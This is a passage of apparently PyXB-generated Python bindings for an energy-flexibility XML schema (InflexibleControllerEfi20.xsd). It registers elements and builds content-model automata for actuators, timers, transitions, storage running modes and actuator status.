    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_18
    del _BuildAutomaton_18
    import pyxb.utils.fac as fac
    counters = set()
    states = []
    # st_0 ('sequenceNr'): final_update None — model may not end here.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(SequentialProfileInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequenceNr')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 389, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1 ('alternativeNr'): also not a permissible end state.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(SequentialProfileInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'alternativeNr')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 390, 3))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2 ('startTime'): accepting, terminal.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(SequentialProfileInstruction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'startTime')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 391, 3))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # Chain the states: st_0 -> st_1 -> st_2.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    st_2._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
SequentialProfileInstruction._Automaton = _BuildAutomaton_18()
SequentialProfileInstructions._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstruction'), SequentialProfileInstruction, scope=SequentialProfileInstructions, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 396, 3)))
def _BuildAutomaton_19 ():
    # One-shot builder for the SequentialProfileInstructions content-model
    # automaton; it removes itself from the module namespace once invoked.
    global _BuildAutomaton_19
    del _BuildAutomaton_19
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 396, 3)
    element_use = pyxb.binding.content.ElementUse(SequentialProfileInstructions._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstruction')), xsd_loc)
    # Single accepting state that loops on 'sequentialProfileInstruction'.
    only_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
SequentialProfileInstructions._Automaton = _BuildAutomaton_19()
Actuator._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodity'), CommodityEnum, scope=Actuator, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 425, 3)))
def _BuildAutomaton_20 ():
    # One-shot builder for the Actuator content-model automaton; it removes
    # itself from the module namespace once invoked.
    global _BuildAutomaton_20
    del _BuildAutomaton_20
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 425, 3)
    element_use = pyxb.binding.content.ElementUse(Actuator._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodity')), xsd_loc)
    # Single accepting state that loops on 'supportedCommodity'.
    only_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
Actuator._Automaton = _BuildAutomaton_20()
Actuators._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuator'), Actuator, scope=Actuators, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 432, 3)))
def _BuildAutomaton_21 ():
    # One-shot builder for the Actuators content-model automaton; it removes
    # itself from the module namespace once invoked.
    global _BuildAutomaton_21
    del _BuildAutomaton_21
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 432, 3)
    element_use = pyxb.binding.content.ElementUse(Actuators._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuator')), xsd_loc)
    # Single accepting state that loops on 'actuator'.
    only_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
Actuators._Automaton = _BuildAutomaton_21()
Timers._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timer'), Timer, scope=Timers, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 442, 3)))
def _BuildAutomaton_22 ():
    # One-shot builder for the Timers content-model automaton; it removes
    # itself from the module namespace once invoked.
    global _BuildAutomaton_22
    del _BuildAutomaton_22
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 442, 3)
    element_use = pyxb.binding.content.ElementUse(Timers._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timer')), xsd_loc)
    # Single accepting state that loops on 'timer'.
    only_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
Timers._Automaton = _BuildAutomaton_22()
Transitions._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transition'), Transition, scope=Transitions, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 447, 3)))
def _BuildAutomaton_23 ():
    # One-shot builder for the Transitions content-model automaton; it removes
    # itself from the module namespace once invoked.
    global _BuildAutomaton_23
    del _BuildAutomaton_23
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 447, 3)
    element_use = pyxb.binding.content.ElementUse(Transitions._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'transition')), xsd_loc)
    # Single accepting state that loops on 'transition'.
    only_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
Transitions._Automaton = _BuildAutomaton_23()
TimerReferences._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timerReference'), CTD_ANON_9, scope=TimerReferences, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 452, 3)))
def _BuildAutomaton_24 ():
    # One-shot builder for the TimerReferences content-model automaton; it
    # removes itself from the module namespace once invoked.
    global _BuildAutomaton_24
    del _BuildAutomaton_24
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 452, 3)
    element_use = pyxb.binding.content.ElementUse(TimerReferences._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timerReference')), xsd_loc)
    # Single accepting state that loops on 'timerReference'.
    only_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
TimerReferences._Automaton = _BuildAutomaton_24()
Transition._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'startTimers'), TimerReferences, scope=Transition, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 461, 3)))
Transition._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'blockingTimers'), TimerReferences, scope=Transition, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 462, 3)))
def _BuildAutomaton_25 ():
    # One-shot builder for the Transition content-model automaton; it removes
    # itself from the module namespace once invoked.
    global _BuildAutomaton_25
    del _BuildAutomaton_25
    import pyxb.utils.fac as fac
    schema = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    loc_start = pyxb.utils.utility.Location(schema, 461, 3)
    loc_blocking = pyxb.utils.utility.Location(schema, 462, 3)
    # Both children are optional (0..1 counters), so either state may start
    # the run and the automaton as a whole is nullable.
    cc_start = fac.CounterCondition(min=0, max=1, metadata=loc_start)
    cc_blocking = fac.CounterCondition(min=0, max=1, metadata=loc_blocking)
    use_start = pyxb.binding.content.ElementUse(Transition._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'startTimers')), loc_start)
    use_blocking = pyxb.binding.content.ElementUse(Transition._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'blockingTimers')), loc_blocking)
    st_start = fac.State(use_start, is_initial=True, final_update=set([fac.UpdateInstruction(cc_start, False)]), is_unordered_catenation=False)
    st_blocking = fac.State(use_blocking, is_initial=True, final_update=set([fac.UpdateInstruction(cc_blocking, False)]), is_unordered_catenation=False)
    st_start._set_transitionSet([
        fac.Transition(st_start, [fac.UpdateInstruction(cc_start, True)]),
        fac.Transition(st_blocking, [fac.UpdateInstruction(cc_start, False)]),
    ])
    st_blocking._set_transitionSet([
        fac.Transition(st_blocking, [fac.UpdateInstruction(cc_blocking, True)]),
    ])
    return fac.Automaton([st_start, st_blocking], set([cc_start, cc_blocking]), True, containing_state=None)
Transition._Automaton = _BuildAutomaton_25()
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'fillingRate'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 608, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), pyxb.binding.datatypes.decimal, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3)))
StorageContinuousRunningModeData._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), pyxb.binding.datatypes.double, scope=StorageContinuousRunningModeData, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3)))
def _BuildAutomaton_26 ():
    # One-shot builder for the StorageContinuousRunningModeData content-model
    # automaton; it removes itself from the module namespace once invoked.
    # The generated pattern is regular, so it is reconstructed data-driven:
    # a required 'fillingRate' followed by six optional (0..1) elements in
    # fixed order, only the first state having no counter.
    global _BuildAutomaton_26
    del _BuildAutomaton_26
    import pyxb.utils.fac as fac
    schema = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # (tag, XSD line) pairs in content-model order.
    element_specs = [
        ('fillingRate', 608),
        ('runningCost', 609),
        ('electricalPower', 610),
        ('gasFlowRate', 611),
        ('heatTemperature', 612),
        ('heatFlowRate', 613),
        ('heatThermalPower', 614),
    ]
    counters = set()
    # One 0..1 counter per optional element; the required first element has none.
    per_state_counter = [None]
    for tag, xsd_line in element_specs[1:]:
        cc = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location(schema, xsd_line, 3))
        counters.add(cc)
        per_state_counter.append(cc)
    states = []
    for idx, (tag, xsd_line) in enumerate(element_specs):
        loc = pyxb.utils.utility.Location(schema, xsd_line, 3)
        use = pyxb.binding.content.ElementUse(StorageContinuousRunningModeData._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), loc)
        final_update = set()
        if per_state_counter[idx] is not None:
            final_update.add(fac.UpdateInstruction(per_state_counter[idx], False))
        states.append(fac.State(use, is_initial=(idx == 0), final_update=final_update, is_unordered_catenation=False))
    # Each state may move forward to any later state; a counted state may also
    # revisit itself while its counter still permits.
    for idx, state in enumerate(states):
        cc = per_state_counter[idx]
        transitions = []
        if cc is not None:
            transitions.append(fac.Transition(state, [fac.UpdateInstruction(cc, True)]))
        for nxt in states[idx + 1:]:
            transitions.append(fac.Transition(nxt, [] if cc is None else [fac.UpdateInstruction(cc, False)]))
        state._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
StorageContinuousRunningModeData._Automaton = _BuildAutomaton_26()
StorageRunningModes._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode'), StorageDiscreteRunningMode, scope=StorageRunningModes, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 652, 4)))
StorageRunningModes._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode'), StorageContinuousRunningMode, scope=StorageRunningModes, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 653, 4)))
def _BuildAutomaton_27 ():
    # One-shot builder for the StorageRunningModes content-model automaton; it
    # removes itself from the module namespace once invoked.
    global _BuildAutomaton_27
    del _BuildAutomaton_27
    import pyxb.utils.fac as fac
    schema = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    def _choice_state(tag, xsd_line):
        use = pyxb.binding.content.ElementUse(StorageRunningModes._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(schema, xsd_line, 4))
        return fac.State(use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    st_discrete = _choice_state('discreteRunningMode', 652)
    st_continuous = _choice_state('continuousRunningMode', 653)
    # Both states are initial, accepting, and fully interconnected: any mix of
    # the two running-mode elements may repeat in any order.
    for state in (st_discrete, st_continuous):
        state._set_transitionSet([
            fac.Transition(st_discrete, []),
            fac.Transition(st_continuous, []),
        ])
    return fac.Automaton([st_discrete, st_continuous], set(), False, containing_state=None)
StorageRunningModes._Automaton = _BuildAutomaton_27()
ActuatorBehaviour._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModes'), StorageRunningModes, scope=ActuatorBehaviour, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 659, 3)))
ActuatorBehaviour._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timers'), Timers, scope=ActuatorBehaviour, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 660, 3)))
ActuatorBehaviour._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transitions'), Transitions, scope=ActuatorBehaviour, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 661, 3)))
def _BuildAutomaton_28 ():
    # One-shot builder for the ActuatorBehaviour content-model automaton; it
    # removes itself from the module namespace once invoked.
    global _BuildAutomaton_28
    del _BuildAutomaton_28
    import pyxb.utils.fac as fac
    schema = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    def _element_use(tag, xsd_line):
        return pyxb.binding.content.ElementUse(ActuatorBehaviour._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag)), pyxb.utils.utility.Location(schema, xsd_line, 3))
    # 'timers' is optional (0..1 counter); 'runningModes' and 'transitions'
    # bracket it, with only the 'transitions' state accepting.
    cc_timers = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location(schema, 660, 3))
    st_modes = fac.State(_element_use('runningModes', 659), is_initial=True, final_update=None, is_unordered_catenation=False)
    st_timers = fac.State(_element_use('timers', 660), is_initial=False, final_update=None, is_unordered_catenation=False)
    st_transitions = fac.State(_element_use('transitions', 661), is_initial=False, final_update=set(), is_unordered_catenation=False)
    st_modes._set_transitionSet([
        fac.Transition(st_timers, []),
        fac.Transition(st_transitions, []),
    ])
    st_timers._set_transitionSet([
        fac.Transition(st_timers, [fac.UpdateInstruction(cc_timers, True)]),
        fac.Transition(st_transitions, [fac.UpdateInstruction(cc_timers, False)]),
    ])
    st_transitions._set_transitionSet([])
    return fac.Automaton([st_modes, st_timers, st_transitions], set([cc_timers]), False, containing_state=None)
ActuatorBehaviour._Automaton = _BuildAutomaton_28()
LeakageFunction._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'leakageElement'), LeakageElement, scope=LeakageFunction, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 672, 3)))
def _BuildAutomaton_29 ():
    # One-shot builder for the LeakageFunction content-model automaton; it
    # removes itself from the module namespace once invoked.
    global _BuildAutomaton_29
    del _BuildAutomaton_29
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 672, 3)
    element_use = pyxb.binding.content.ElementUse(LeakageFunction._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'leakageElement')), xsd_loc)
    # Single accepting state that loops on 'leakageElement'.
    only_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
LeakageFunction._Automaton = _BuildAutomaton_29()
ActuatorBehaviours._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviour'), ActuatorBehaviour, scope=ActuatorBehaviours, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 677, 3)))
def _BuildAutomaton_30 ():
    # One-shot builder for the ActuatorBehaviours content-model automaton; it
    # removes itself from the module namespace once invoked.
    global _BuildAutomaton_30
    del _BuildAutomaton_30
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 677, 3)
    element_use = pyxb.binding.content.ElementUse(ActuatorBehaviours._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviour')), xsd_loc)
    # Single accepting state that loops on 'actuatorBehaviour'.
    only_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    only_state._set_transitionSet([fac.Transition(only_state, [])])
    return fac.Automaton([only_state], set(), False, containing_state=None)
ActuatorBehaviours._Automaton = _BuildAutomaton_30()
TimerUpdate._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'finishedAt'), pyxb.binding.datatypes.dateTime, scope=TimerUpdate, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 699, 3)))
def _BuildAutomaton_31 ():
    # One-shot builder for the TimerUpdate content-model automaton; it removes
    # itself from the module namespace once invoked.
    global _BuildAutomaton_31
    del _BuildAutomaton_31
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 699, 3)
    element_use = pyxb.binding.content.ElementUse(TimerUpdate._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'finishedAt')), xsd_loc)
    # Exactly one 'finishedAt': the accepting state has no outgoing transitions.
    only_state = fac.State(element_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    only_state._set_transitionSet([])
    return fac.Automaton([only_state], set(), False, containing_state=None)
TimerUpdate._Automaton = _BuildAutomaton_31()
TimerUpdates._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timerUpdate'), TimerUpdate, scope=TimerUpdates, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 705, 3)))
def _BuildAutomaton_32 ():
    # One-shot builder for the TimerUpdates content-model automaton; it removes
    # itself from the module namespace once invoked.
    global _BuildAutomaton_32
    del _BuildAutomaton_32
    import pyxb.utils.fac as fac
    xsd_loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 705, 3)
    # 'timerUpdate' occurs zero or more times: unbounded counter plus a
    # nullable automaton.
    cc_updates = fac.CounterCondition(min=0, max=None, metadata=xsd_loc)
    element_use = pyxb.binding.content.ElementUse(TimerUpdates._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timerUpdate')), xsd_loc)
    only_state = fac.State(element_use, is_initial=True, final_update=set([fac.UpdateInstruction(cc_updates, False)]), is_unordered_catenation=False)
    only_state._set_transitionSet([fac.Transition(only_state, [fac.UpdateInstruction(cc_updates, True)])])
    return fac.Automaton([only_state], set([cc_updates]), True, containing_state=None)
TimerUpdates._Automaton = _BuildAutomaton_32()
# Register the ActuatorStatus child elements with the binding class; the
# matching content-model automaton is built by the following helper.
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'currentRunningMode'), pyxb.binding.datatypes.int, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 710, 3)))
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), STD_ANON, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 711, 3)))
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId'), pyxb.binding.datatypes.int, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 719, 3)))
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp'), pyxb.binding.datatypes.dateTime, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 720, 3)))
ActuatorStatus._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates'), TimerUpdates, scope=ActuatorStatus, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 721, 3)))
def _BuildAutomaton_33 ():
    """Build the FAC content-model automaton for ActuatorStatus.

    The model is a sequence: 'currentRunningMode' followed by four
    elements each guarded by a 0..1 counter condition (so each of them
    is optional in the instance document).  PyXB-generated code; see
    pyxb.utils.fac for automaton/counter semantics.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_33
    del _BuildAutomaton_33
    import pyxb.utils.fac as fac
    counters = set()
    # One 0..1 counter per optional trailing element.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 711, 3))
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 719, 3))
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 720, 3))
    counters.add(cc_2)
    cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 721, 3))
    counters.add(cc_3)
    states = []
    # st_0: currentRunningMode — the only initial state.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currentRunningMode')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 710, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: runningModeFactor (guarded by cc_0).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 711, 3))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: previousRunningModeId (guarded by cc_1).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 719, 3))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: transitionTimestamp (guarded by cc_2).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 720, 3))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # st_4: timerUpdates (guarded by cc_3).
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_3, False))
    symbol = pyxb.binding.content.ElementUse(ActuatorStatus._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 721, 3))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # From st_0 any later element may appear next (all optional).
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    transitions.append(fac.Transition(st_2, [
        ]))
    transitions.append(fac.Transition(st_3, [
        ]))
    transitions.append(fac.Transition(st_4, [
        ]))
    st_0._set_transitionSet(transitions)
    # From each optional state: self-loop increments its counter (True);
    # advancing to a later state finalizes it (False).
    transitions = []
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_3, True) ]))
    st_4._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Install the ActuatorStatus content-model automaton and register the
# single child element of ActuatorStatuses.
ActuatorStatus._Automaton = _BuildAutomaton_33()
ActuatorStatuses._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatus'), ActuatorStatus, scope=ActuatorStatuses, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 727, 3)))
def _BuildAutomaton_34 ():
    """Construct the content-model automaton for ActuatorStatuses.

    The model is a single repeating 'actuatorStatus' element: one
    accepting state with an unguarded self-loop and no counters.
    """
    # This builder runs exactly once; drop it from the module namespace
    # so it cannot be invoked again.
    global _BuildAutomaton_34
    del _BuildAutomaton_34
    import pyxb.utils.fac as fac

    element_use = pyxb.binding.content.ElementUse(
        ActuatorStatuses._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatus')),
        pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 727, 3))
    only_state = fac.State(element_use, is_initial=True, final_update=set(),
